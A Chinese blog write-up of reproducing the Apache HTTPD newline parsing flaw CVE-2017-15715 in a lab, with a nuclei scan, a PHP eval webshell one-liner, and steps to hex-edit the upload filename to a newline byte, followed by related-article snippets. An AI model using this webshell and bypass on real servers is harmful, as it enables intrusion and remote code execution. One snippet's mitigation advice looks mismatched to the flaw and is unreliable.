apache-httpd_换行解析漏洞_CVE-2017-15715

最新推荐文章于 2024-10-21 18:43:40 发布
原创 最新推荐文章于 2024-10-21 18:43:40 发布 · 294 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#apache #网络安全

这篇文章详细描述了ApacheHTTPD2.4.0至2.4.29版本中的一个高危漏洞,该漏洞允许通过换行符绕过安全策略,进行PHP文件解析和命令执行。通过Nuclei工具可扫描并验证漏洞,建议及时升级以修复这一问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

apache-httpd_换行解析漏洞_CVE-2017-15715

说明内容
漏洞编号CVE-2017-15715
漏洞名称apache-httpd 换行解析漏洞
漏洞评级高危
影响范围Apache HTTPd 2.4.0~2.4.29
漏洞描述apache 在修复第一个后缀名解析漏洞时,绕过一些服务器的安全策略
修复方案升级

漏洞描述

Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。 此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照 php 后缀进行解析,导致绕过一些服务器的安全策略。

漏洞等级

高危

影响版本

  • Apache HTTPd 2.4.0~2.4.29

漏洞复现

基础环境

组件版本
OSkali-linux
Web Serverchrome
apache httpd2.4.0

漏洞扫描

使用nuclei工具可以扫描到

./nuclei -u 192.168.117.163

在这里插入图片描述

漏洞验证

  1. 启动环境,访问网站

    在这里插入图片描述

  2. 上传文件,内容为一句话木马+phpinfo,格式为.php,进行抓包

    <?php @eval($_REQUEST[777]);phpinfo(); ?>

    在这里插入图片描述

  3. 在文件名1_info.php后加一个.,为了之后好找

    1_info.php.

    在这里插入图片描述

  4. 查看16进制编码,找到刚刚添加的.,编码为2e

    在这里插入图片描述

  5. 将2e修改为0a,进行发包

    在这里插入图片描述

  6. 访问刚刚上传的1_info.php%0a

    http://192.168.117.163/1_info.php%0a

    在这里插入图片描述

深度利用

命令执行

可以通过修改php文件内容进行命令执行

GetShell

可以通过上传木马getshell

漏洞挖掘

网络测绘

apache httpd

修复建议

11-4 Apache换行解析漏洞CVE-2017-15715
weixin_43263566的博客
11-25 1236
Apache換行解析漏洞CVE-2017-15715)是一种解析漏洞,可以影响httpd 2.4.0至2.4.29版本中的PHP解析。攻击者可以通过在上传的文件名中添加特定的换行符,绕过服务器的安全策略,使其被解析成PHP文件而不是普通文件。未正确配置的服务器未对文件名进行适当验证的服务器使用正则表达式并启用Multiline属性的服务器攻击者可以将1.php\x0A作为文件名上传到服务器上,这个文件名看起来像是一个普通的非PHP文件,但是由于其中的特定字符,服务器会将其解析为PHP文件。
Apache HTTPD 换行解析漏洞CVE-2017-15715
最新发布
weixin_45534587的博客
01-05 1565
如果是白名单可能不行(在白名单里面才可以上传jpj,png,gif 等),但是如果没有考虑以最后一个点为后缀,通过1.jpg.php%0a的形式也可能能够绕过。前三行的内容意思是将所有以“.php”为后缀的文件内容当作PHP代码进行解析,但是却使用了“$”进行文件匹配,这就导致了漏洞的产生。该漏洞属于用户配置不当所产生的,看一下配置文件信息,输入命令“cat /etc/apache2/conf-available/docker-php.conf”,如图所示。老版本可以通过hex修改,修改完,文件正常上传。
05 - vulhub - Apache HTTPD 换行解析漏洞CVE-2024-15715
2401_84023482的博客
04-03 381
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
漏洞复现(Vulhub)-Apache HTTPD 换行解析漏洞CVE-2017-15715
qq_60848021的博客
09-20 1463
原理:apache-CVE-2017-15715 的出现是由于apache 在修复第一个后缀名解析漏洞时,使用 正则表达式匹配后缀,在解析php时xxx.php\\x0A 将被php后缀进行解析,导致绕过一些服务器的安全策略。命令含义:--zone #作用域 --add-port=80/tcp #添加端口,格式为:端口/通讯协议 --permanent #永久生效,没有此参数重启后失效。firewall-cmd --list-ports 查看所有开启的端口。成功出现php配置文件界面,说明解析成功。
Apache换行解析漏洞复现(CVE-2017-15715
weixin_57379923的博客
08-04 790
靶机:由 centos7 搭建的 vulhub,IP:192.168.100.40。浏览器访问上传的文件在文件名后添加 %0a 进行访问。版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!作 者:PeiyuJue。
CVE-2017-15715Apache HTTPD 换行解析漏洞
2401_86120759的博客
10-21 476
ApacheHTTPD换行解析漏洞CVE-2017-15715Apache HTTPD是一款http服务器,其2.4.0~2.4.29版本中存在一个解析漏洞。在php解析时,将被按照PHP后缀进行解析,直接导致绕过某些安全策略。
Apache HTTPD 换行解析漏洞
haoxue__的博客
02-24 164
Apache HTTPD 换行解析漏洞
Apache HTTPD 换行解析漏洞CVE-2017-15715)(笔记)
wswr的博客
03-21 329
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。 2.4.0~2.4.29 版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 Vulhub - Docker-Compose file for vulnerability environment ...
漏洞复现】Apache HTTPD 换行解析漏洞CVE-2017-15715
weixin_47443077的博客
06-07 222
Apache HTTPD 换行解析漏洞CVE-2017-15715) 文章目录Apache HTTPD 换行解析漏洞CVE-2017-15715)0x01漏洞背景0x02漏洞环境0x03漏洞复现 0x01漏洞背景 Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略 0x02漏洞环境 编译及运行漏洞环境docker-compose
vulhub靶场 Apache HTTPD 换行解析漏洞
qq_42933711的博客
04-24 322
vulhub靶场 Apache HTTPD 换行解析漏洞 Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 在本地启动你的漏洞环境之后访问http:// +你的IP:8080 漏洞复现 在网页打开你的漏洞环境 上传一个任意的php脚本文件 设置你的本地环境,使用burp suite 进行抓包 将你的数据包
Apache HTTPD 换行漏洞CVE-2017-15715
sleepywin的博客
08-08 389
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
Apache HTTPD 换行解析漏洞CVE-2017-15715)的分析与复现
dgjkkhcf的博客
07-27 3014
ApacheHTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
Apache Httpd 常见漏洞解析(全)
黑战士的博客
02-17 4236
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞。在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
Apache HTTPD 换行解析漏洞Apache
12-28
### Apache HTTPD 换行解析漏洞详情 Apache HTTPD 的 2.4.0 至 2.4.29 版本中存在一个严重的解析漏洞,编号为 CVE-2017-15715。此漏洞允许攻击者通过特定方式利用文件名中的换行符 (\x0A),使服务器错误地处理 PHP 文件[^1]。 当请求路径包含 \x0A 字符时,Apache HTTPD 可能会将其解释为新行字符并继续执行后续部分作为有效脚本。这使得恶意用户能够绕过基于 URL 或扩展名的安全控制措施,从而可能访问受限资源或执行任意代码[^2]。 例如,在 php 解析过程中 `test.php\x0A` 将被当作正常的 PHP 后缀进行解析,进而触发该漏洞。 ### 修复方法 为了防止此类攻击的发生,官方建议升级到最新稳定版的 Apache HTTP Server (至少 2.4.30+) 来获得针对这一问题的补丁和支持改进。 如果无法立即更新,则可以考虑采取以下临时缓解措施之一: #### 修改配置文件 编辑 httpd.conf 配置文件以禁用 mod_mime_magic 模块加载: ```apache LoadModule mime_module modules/mod_mime.so # Comment out or remove the following line to disable magic MIME type detection # LoadModule mime_magic_module modules/mod_mime_magic.so ``` #### 使用 .htaccess 设置 对于那些没有权限修改全局配置的情况,可以在应用程序根目录下的 `.htaccess` 中加入如下指令来阻止含有非法字符的 URI 请求: ```apache <If "%{THE_REQUEST} =~ /[\r\n]/"> Require all denied </If> ``` 这些更改有助于减少因未修补版本而带来的风险,但仍强烈推荐尽快安装正式发布的安全更新包。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值